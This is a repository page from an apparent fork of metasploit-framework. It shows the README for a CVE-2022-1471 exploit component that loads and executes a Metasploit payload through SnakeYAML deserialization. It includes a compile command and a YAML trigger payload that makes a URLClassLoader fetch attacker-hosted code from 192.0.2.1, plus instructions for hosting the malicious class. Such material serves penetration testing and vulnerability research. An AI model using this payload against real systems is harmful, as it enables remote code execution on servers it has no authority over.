dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/external/source/exploits/CVE-2022-1471
History
Spencer McIntyre 86b7ec4518 Address comments from the review 2023-10-12 09:50:19 -04:00
..
MyScriptEngineFactory.java Address comments from the review 2023-10-12 09:50:19 -04:00
README.md Address comments from the review 2023-10-12 09:50:19 -04:00

README.md

Overview

The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.

See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.

Compiling

It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the metasploit-payloads repository for instructions on how to compile the main Java payloads and install the data files.

Compile the Java source file using javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java.

Usage

Trigger the deserialization using the following YAML:

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]

Host the compiled class on an HTTP server along with the file /META-INF/services/javax.script.ScriptEngineFactory. The contents of this file should simply be the class name to load (MyScriptEngineFactory). See Metasploit's Msf::Exploit::Remote::Java::HTTP::ClassLoader mixin for more information and the remaining components necessary to deliver a Metasploit payload.